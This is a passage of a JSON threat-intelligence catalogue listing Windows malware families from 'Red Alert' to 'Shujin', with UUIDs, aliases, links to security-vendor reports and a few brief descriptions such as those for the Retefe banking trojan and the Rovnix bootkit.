"https://twitter.com/JaromirHorejsi/status/816237293073797121" ], "synonyms": [], "type": [] }, "uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618", "value": "Red Alert" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler", "http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf" ], "synonyms": [], "type": [] }, "uuid": "ca8ed7c0-f40b-4c0e-9dc4-52d6e0da41a7", "value": "Red Gambler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg", "https://sensepost.com/discover/tools/reGeorg/", "https://github.com/sensepost/reGeorg" ], "synonyms": [], "type": [] }, "uuid": "9ee0eb87-7648-4581-b301-7472a48946ad", "value": "reGeorg" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin", "https://www.youtube.com/watch?v=jeLd-gw2bWo" ], "synonyms": [], "type": [] }, "uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb", "value": "Regin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "http://malware-traffic-analysis.net/2017/12/22/index.html", "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", "https://secrary.com/ReversingMalware/RemcosRAT/" ], "synonyms": [], "type": [] }, "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2", "value": "Remcos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi", 
"https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" ], "synonyms": [], "type": [] }, "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada", "value": "Remexi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" ], "synonyms": [], "type": [] }, "uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9", "value": "Remsec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy" ], "synonyms": [], "type": [] }, "uuid": "b2b93651-cf64-47f5-a54f-799b919c592c", "value": "Remy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom", "https://www.coresecurity.com/sites/default/files/resources/2017/03/Behind_Malware_Infection_Chain.pdf" ], "synonyms": [], "type": [] }, "uuid": "a1f137d4-298f-4761-935d-bd39ab898479", "value": "Rerdom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup", "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/" ], "synonyms": [], "type": [] }, "uuid": "42fa55e3-e708-4c11-b807-f31573639941", "value": "Retadup" }, { "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. Its primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. 
The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe", "https://github.com/cocaman/retefe", "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "https://www.govcert.admin.ch/blog/35/reversing-retefe", "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/" ], "synonyms": [ "Tsukuba", "Werdlod" ], "type": [] }, "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", "value": "Retefe (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat", "https://isc.sans.edu/diary/rss/22590", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/" ], "synonyms": [ "Revetrat" ], "type": [] }, "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f", "value": "Revenge RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/" ], "synonyms": [], "type": [] }, "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", "value": "RGDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor", "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf" ], "synonyms": [], "type": [] }, "uuid": "2639b71e-1bf1-4cd2-8fa2-9498e893ef3f", "value": "Rifdoor" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [], "type": [] }, "uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043", "value": "Rikamanu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2011/Edwards-Nazario-VB2011.pdf" ], "synonyms": [], "type": [] }, "uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a", "value": "Rincux" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm", "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/" ], "synonyms": [], "type": [] }, "uuid": "a85b0619-ed8e-4324-8603-af211d682dac", "value": "Ripper ATM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock", "https://github.com/securitykitten/malware_references/blob/master/rmshixdAPT-C-15-20160630.pdf" ], "synonyms": [ "yellowalbatross" ], "type": [] }, "uuid": "95a26977-295f-4843-ad11-a3d9dcb6c192", "value": "rock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader", "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware" ], "synonyms": [], "type": [] }, "uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e", "value": "Rockloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin" ], "synonyms": [], "type": [] }, "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf", "value": "Rofin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku" ], "synonyms": [], "type": [] }, "uuid": "38f57823-ccc2-424b-8140-8ba30325af9c", "value": "Rokku" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat", "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/", "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/", "https://www.youtube.com/watch?v=uoBQE5s2ba4", "http://v3lo.tistory.com/24", "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/" ], "synonyms": [], "type": [] }, "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5", "value": "RokRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik", "http://blogs.cisco.com/security/talos/rombertik" ], "synonyms": [ "CarbonGrabber" ], "type": [] }, "uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1", "value": "Rombertik" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos" ], "synonyms": [], "type": [] }, "uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a", "value": "Romeo(Alfa,Bravo, ...)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs" ], "synonyms": [], "type": [] }, "uuid": "b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9", "value": "Roopirs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" ], "synonyms": [], "type": [] }, "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b", "value": "Roseam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover", 
"http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" ], "synonyms": [], "type": [] }, "uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050", "value": "Rover" }, { "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix", "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0", "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", "https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981", "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html" ], "synonyms": [ "BkLoader", "Cidox", "Mayachok" ], "type": [] }, "uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f", "value": "Rovnix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", "https://github.com/nccgroup/Royal_APT", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72", "value": "RoyalCli" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", "https://github.com/nccgroup/Royal_APT", 
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a", "value": "Royal DNS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena", "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena" ], "synonyms": [], "type": [] }, "uuid": "cf74b7a5-72c0-4c2a-96c1-b3c49fc8f766", "value": "Rozena" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" ], "synonyms": [], "type": [] }, "uuid": "e6952b4d-e96d-4641-a88f-60074776d553", "value": "RTM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos", "https://boozallenmts.com/resources/news/rtpos-new-point-sale-malware-family-uncovered" ], "synonyms": [], "type": [] }, "uuid": "89ee2cb0-2c72-4a25-825b-bb56083fdd9b", "value": "rtpos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv", "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear" ], "synonyms": [], "type": [] }, "uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2", "value": "Ruckguv" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish" ], "synonyms": [], "type": [] }, "uuid": "e1564cfe-ab82-4c14-8f92-65af0d760d70", "value": "Rumish" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat", "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" ], "synonyms": [], "type": [] }, "uuid": "b746a645-5974-44db-a811-a024214b7fba", "value": "running_rat" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar", "https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction" ], "synonyms": [ "RCSU" ], "type": [] }, "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", "value": "Rurktar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock", "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", "http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html", "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/", "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf", "https://www.secureworks.com/blog/research-21041", "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/" ], "synonyms": [], "type": [] }, "uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d", "value": "Rustock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk", "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/" ], "synonyms": [], "type": [] }, "uuid": "62c79940-184e-4b8d-9237-35434bb79678", "value": "Ryuk" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom", "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", "http://malware-traffic-analysis.net/2017/10/13/index.html", "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/" ], "synonyms": [ "Saga" ], "type": [] }, "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431", "value": "SAGE" }, { "description": "Sakula / Sakurel is a trojan horse that 
opens a back door and downloads potentially malicious files onto the compromised computer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat", "https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", "https://www.secureworks.com/research/sakula-malware-family" ], "synonyms": [ "Sakurel" ], "type": [] }, "uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b", "value": "Sakula RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea", "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf" ], "synonyms": [], "type": [] }, "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e", "value": "Salgorea" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf" ], "synonyms": [], "type": [] }, "uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a", "value": "Sality" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", "http://blog.talosintel.com/2016/03/samsam-ransomware.html", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/", "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public", "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", 
"http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html" ], "synonyms": [], "type": [] }, "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a", "value": "SamSam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny", "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" ], "synonyms": [ "Daws" ], "type": [] }, "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", "value": "Sanny" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a", "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html" ], "synonyms": [ "Hussarini" ], "type": [] }, "uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e", "value": "Sarhust" }, { "description": "Sasfis acts mostly as a downloader that has been observed to download Asprox and FakeAV. According to a VirusBulletin article from 2012, it is likely authored by the same group as SmokeLoader.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis", "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-malware-uses-a-new-trick/", "https://www.symantec.com/security-center/writeup/2010-020210-5440-99", "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-fizzles-in-the-background/", "https://isc.sans.edu/forums/diary/Sasfis+Propagation/8860/", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/sasfis", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Sasfis-O/detailed-analysis.aspx", "https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign" ], "synonyms": [ "Oficla" ], "type": [] }, "uuid": "4c4ceb45-b326-45aa-8f1a-1229e90c78b4", "value": "Sasfis" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" ], "synonyms": [], "type": [] }, "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", "value": "Satan Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", "https://www.cylance.com/threat-spotlight-satan-raas" ], "synonyms": [], "type": [] }, "uuid": "09b555be-8bac-44b2-8741-922ee0b87880", "value": "Satana" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot", "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" ], "synonyms": [], "type": [] }, "uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369", "value": "Sathurbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware" ], "synonyms": [], "type": [] }, "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf", "value": "ScanPOS" }, { "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). 
The entire code is Base64-encoded.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken", "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb", "https://github.com/vithakur/schneiken" ], "synonyms": [], "type": [] }, "uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d", "value": "Schneiken" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scote", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/" ], "synonyms": [], "type": [] }, "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e", "value": "Scote" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker", "https://twitter.com/struppigel/status/791535679905927168" ], "synonyms": [], "type": [] }, "uuid": "9803b201-28e5-40c5-b661-c1a191388072", "value": "ScreenLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" ], "synonyms": [], "type": [] }, "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207", "value": "SeaDaddy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c", "value": "SeaSalt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", 
"https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", "https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/" ], "synonyms": [], "type": [] }, "uuid": "272268bb-2715-476b-a121-49142581c559", "value": "SeDll" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco", "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html" ], "synonyms": [ "azzy", "eviltoss" ], "type": [] }, "uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75", "value": "Sedreco" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader", "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/", "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", 
"https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed" ], "synonyms": [ "carberplike", "downrage", "jhuhugit", "jkeyskw" ], "type": [] }, "uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c", "value": "Seduploader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe" ], "synonyms": [], "type": [] }, "uuid": "503ca41c-7788-477c-869b-ac530f20c490", "value": "SendSafe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico" ], "synonyms": [], "type": [] }, "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", "value": "Serpico" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", "https://securelist.com/shadowpad-in-corporate-networks/81432/", "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070" ], "synonyms": [ "XShellGhost" ], "type": [] }, "uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7", "value": "ShadowPad" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti", "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" ], "synonyms": [], "type": [] }, "uuid": "f64683c8-50ab-42c0-8b90-881598906528", "value": "Shakti" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" ], "synonyms": [], "type": [] }, "uuid": "15dd8386-f11a-485a-b719-440c0a47dee6", "value": "SHAPESHIFT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip", 
"https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" ], "synonyms": [ "remotecmd" ], "type": [] }, "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", "value": "shareip" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot", "https://eromang.zataz.com/tag/agentbase-exe/", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf" ], "synonyms": [ "Bitrep" ], "type": [] }, "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43", "value": "SHARPKNOT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker", "https://twitter.com/JaromirHorejsi/status/813726714228604928" ], "synonyms": [], "type": [] }, "uuid": "af35e295-7087-4f6c-9f70-a431bf223822", "value": "ShellLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" ], "synonyms": [], "type": [] }, "uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3", "value": "Shifu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" ], "synonyms": [], "type": [] }, "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", "value": "Shim RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin", "http://www.nyxbone.com/malware/chineseRansom.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/" ], "synonyms": [], "type": [] }, "uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6", "value": "Shujin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr", 
